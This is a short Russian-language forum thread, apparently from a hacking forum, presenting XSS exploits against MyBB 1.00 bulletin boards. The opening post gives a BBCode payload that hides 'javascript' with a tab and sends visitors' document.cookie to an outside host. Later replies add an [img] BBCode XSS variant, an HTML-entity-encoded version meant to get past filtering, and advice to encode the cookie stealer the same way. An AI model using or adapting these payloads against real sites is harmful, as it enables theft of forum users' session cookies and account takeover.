Форумы XSS в MyBB (MyBulletinBoard 1.00)

Эксплоит

HTML:

[url=" style=`background:url(javaS	cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]

javascript через табуляцию

Проверялось в форуме
http://mybboard.com/community/

 

Excellent !

ThX Algol

 

Спасибо, но мне кажется я гдето это видел... а не на секьюри?

 

А зачем тебе обратный слеш \; ?

Кстати если написать вот так,

HTML:

[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');

То будет работать во всех трех браузерах, Опера, Фаерфокс и ИЕ. Но так как Фаерфокс имеет автоматическую защиту, то алерт выскочит только в ИЕ и Опере.

Строку,

Нужно закодировать Юникодом UTF-8 используя эту ссылку.

http://ha.ckers.org/xss.html

Там где говориться

Так как произойдет фильтрация.

Будет это все выглядеть типа вот так,

HTML:

[img]http://www.wj"'='.gif[/img]'style=&#98&#97&#99&#107&#103&#114&#111&#117&#110&#100&#58&#117&#114&#108&#40&#39&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#119&#106&#47&#41&#39&#41&#59

Только после каждого символа, теперь надо поставить точку с запятой. (;)

Код для воровки кук, можно взять от Алгола и так же его закодировать.